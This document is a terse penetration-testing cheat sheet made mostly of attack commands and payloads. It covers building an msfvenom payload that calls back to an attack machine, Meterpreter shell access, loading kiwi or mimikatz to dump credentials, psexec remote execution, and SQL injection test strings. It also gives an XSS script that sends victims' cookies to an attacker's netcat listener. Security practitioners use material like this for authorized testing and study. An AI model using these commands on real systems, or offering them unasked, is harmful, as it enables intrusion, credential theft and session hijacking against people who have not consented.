Metasploit

Meterpreter

Powershell Empire

PSEXEC

SQL Injection

XSS

Metasploit

• Create standalone payload via MSFVenom 
  • # msfvenom -p [payload] LHOST=[attack_machine] LPORT=[attack_port] -f [file_extension] > [path_to_file+ext]

Meterpreter

• Invoke shell
  • meterpreter > execute -f cmd.exe -c
  • meterpreter > channel -I [#]
• Load primary and extended functionality
  • meterpreter > load stdapi
  • meterpreter > load extapi
• Load Mimikatz or Kiwi (for dumping credentials in memory)
  • meterpreter > load kiwi
  • meterpreter > load mimikatz
• Launch executable
  • execute -f [program.exe] -c

Powershell Empire

PSEXEC

• Launch PSEXEC against a remote target
  • C:\> psexec \\[targetIP] [-d] [-u user] [-p password] [command]

SQL Injection

• Testing for SQL Injection using TRUE statements
  • ' ' or 1=1
  • " or 1=1
  • ' or 'a'='a
  • ') or ('a'='a

Cross Site Scripting (XSS)

• Reflected
• Stored
• DOM
• Using Netcat to grab cookies
  • Set up listener on attacker machine
    • nc -l -n -p [port_num]
  • Embed script on target site
    • <script>document.location='http://[your_address]:[PN]/grab.cgi?'+document.cookie;</script>